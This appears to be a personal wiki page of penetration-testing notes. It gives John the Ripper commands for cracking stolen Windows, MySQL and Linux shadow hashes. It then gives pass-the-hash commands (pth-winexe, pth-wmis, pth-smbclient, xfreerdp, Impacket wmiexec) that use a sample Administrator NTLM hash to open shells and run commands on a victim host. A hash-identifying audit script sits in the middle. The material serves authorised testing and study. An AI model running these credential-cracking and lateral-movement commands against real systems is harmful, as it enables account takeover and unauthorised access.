Password hash attack

lethanhtung01011980 edited this page Apr 23, 2020 · 24 revisions

Goals

  • To crack obtained password hash

1. Identify hash type

  • In Kali, run hash-identifier
  • Then key in the hash to get its likely type

2. Crack the hash dump

Scenario: no root/SYSTEM privilege yet, but a password hash has already been obtained via LFI or RFI.

2.1 Crack any hash (with known hash type)

  • Use the hash type identified in step 1 for the --format option.
  • Sample john for various hash: http://pentestmonkey.net/cheat-sheet/john-the-ripper-hash-formats
  • Backup link: https://github.com/lethanhtung01011980/Notes/wiki/john
  • john --fork=25 --wordlist=/usr/share/wordlists/rockyou.txt --format=raw-sha1 10.10.10.11.hash

Do you need to put a * in front of the hash for mysql-sha1?

  • john --fork=25 --wordlist=/usr/share/wordlists/rockyou.txt --format=mysql-sha1 10.10.10.11.hash

2.2 Crack Windows hash dump

First obtain a hash dump with pwdump or fgdump.

  • pwdump output from Windows: john 127.0.0.1.pwdump
  • Use with wordlist: john --wordlist=/usr/share/wordlists/rockyou.txt 127.0.0.1.pwdump
  • Use with wordlist + mutation: john --rules --wordlist=/usr/share/wordlists/rockyou.txt 127.0.0.1.pwdump

2.3 Crack Linux shadow hash

Save the contents of /etc/passwd and /etc/shadow as password.txt and shadow.txt.

  • The hashes should be MD5-crypt ($1$ prefix in /etc/shadow)

  • unshadow 141-password.txt 141-shadow.txt > 141-unshadow.txt

  • john --rules --wordlist=/usr/share/wordlists/rockyou.txt 141-unshadow.txt

  • With 25 forked processes: john --rules --fork=25 --wordlist=/usr/share/wordlists/rockyou.txt 141-unshadow.txt
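Steps 1 to 2.3 above all hinge on recognising the storage format before picking a john --format. The script below is an added example, not part of the original notes: it classifies the formats the notes deal with (pwdump LM:NT lines, mysql-sha1 with its leading *, raw SHA-1, and $1$/$5$/$6$ crypt lines from unshadow output) and flags the weak ones an auditor would want migrated. The sample lines are constructed; only the NT demo hash comes from this page.

```python
import re

# Constructed sample hash lines, one per format handled in the notes above.
# The pwdump line reuses the page's demo NT hash; everything else is made up.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"   # LM hash of the empty password
HEX40 = re.compile(r"^[0-9a-fA-F]{40}$")
PWDUMP = re.compile(r"^([^:]+):(\d+):([0-9a-fA-F]{32}):([0-9a-fA-F]{32}):::$")
CRYPT_FORMATS = {"1": "md5crypt", "5": "sha256crypt", "6": "sha512crypt"}

def identify(line):
    """Map one hash line to (john --format name, audit note); (None, note) if unknown."""
    line = line.strip()
    m = PWDUMP.match(line)
    if m:
        user, _rid, lm, _nt = m.groups()
        if lm.lower() == EMPTY_LM:
            return "nt", f"{user}: LM hash empty, NT hash only"
        return "nt", f"{user}: LM hash stored, weak legacy format"
    if line.startswith("*") and HEX40.match(line[1:]):
        return "mysql-sha1", "keep the leading * when feeding john"
    if HEX40.match(line):
        return "raw-sha1", "unsalted SHA-1"
    fields = line.split(":")
    if len(fields) >= 2 and fields[1].startswith("$"):
        # /etc/shadow or unshadow output: user:$id$salt$hash:...
        parts = fields[1].split("$")
        fmt = CRYPT_FORMATS.get(parts[1]) if len(parts) >= 4 else None
        if fmt:
            note = "legacy MD5-crypt, migrate to sha512crypt" if parts[1] == "1" else "modern crypt"
            return fmt, f"{fields[0]}: {note}"
    return None, "unrecognised format, run hash-identifier manually"

def audit(lines):
    """Identify every non-empty line; returns a list of (line, format, note)."""
    return [(l.strip(),) + identify(l) for l in lines if l.strip()]

SAMPLES = [
    "Administrator:500:aad3b435b51404eeaad3b435b51404ee:C0F2E311D3F450A7FF2571BB59FBEDE5:::",
    "*" + "A" * 40,
    "b" * 40,
    "root:$1$saltsalt$" + "x" * 22 + ":0:0:root:/root:/bin/bash",
    "bob:$6$saltsalt$" + "y" * 86 + ":18000:0:99999:7:::",
    "not-a-hash",
]

if __name__ == "__main__":
    for line, fmt, note in audit(SAMPLES):
        print(f"{fmt or '?':12} {note:45} {line[:40]}")
```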

2.4 Crack hash online

3. Passing the hash in Windows

NTLM/LM password hashes are not salted and remain static between sessions and computers.

  • We copy the local administrator NTLM hash of the hacked machine
  • Use this discovered hash with a patched pth-winexe to gain a shell on a different machine which has the same local administrator / password combination.
  • /usr/bin/pth-winexe

pth tools in Kali

  • Ref: https://www.hacklikeapornstar.com/all-pth-techniques/
  • /usr/bin/pth*
  • pth-net: executes net commands (net user, net share) on remote hosts
  • pth-rpcclient: opens an interactive session to execute RPC commands
  • pth-smbclient: browses available shares on remote computers
  • pth-winexe: executes interactively a command on remote computers
  • pth-wmic: executes WMI queries on remote computers
  • pth-wmis: executes a command using WMI on remote computers

3.1 Using pth

Remote command execution via cmd.exe

  • pth-winexe -U WORKGROUP/Administrator%hash:hash //victim-ip cmd.exe
  • Example: pth-winexe -U WORKGROUP/Administrator%aad3b435b51404eeaad3b435b51404ee:C0F2E311D3F450A7FF2571BB59FBEDE5 //192.168.1.25 cmd.exe

Other examples

  • pth-wmic -U WORKGROUP/Administrator%aad3b435b51404eeaad3b435b51404ee:C0F2E311D3F450A7FF2571BB59FBEDE5 //192.168.1.25 "select Name from Win32_UserAccount"
  • pth-wmis -U WORKGROUP/Administrator%aad3b435b51404eeaad3b435b51404ee:C0F2E311D3F450A7FF2571BB59FBEDE5 //192.168.1.25 "cmd.exe /c whoami > c:\temp\result.txt"
  • pth-smbclient -U WORKGROUP/Administrator%aad3b435b51404eeaad3b435b51404ee:C0F2E311D3F450A7FF2571BB59FBEDE5 //192.168.1.25/c$
  • pth-rpcclient -U WORKGROUP/Administrator%aad3b435b51404eeaad3b435b51404ee:C0F2E311D3F450A7FF2571BB59FBEDE5 //192.168.1.25

Remote desktop using the hash (for a Windows 2012 R2 or Windows 8.1 victim)

  • apt-get update
  • apt-get install freerdp-x11
  • xfreerdp /u:richard /d:workgroup /pth:C0F2E311D3F450A7FF2571BB59FBEDE5 /v:192.168.1.25

3.2 Using Impacket

Already installed in Kali.

  • Requires SMB port 445 to be open.
  • wmiexec.py -hashes hash1:hash2 administrator@victim-ip
  • Also works without the LM half: wmiexec.py -hashes :XXXXX7A37513BXXXX08952XXXX522B administrator@victim-ip
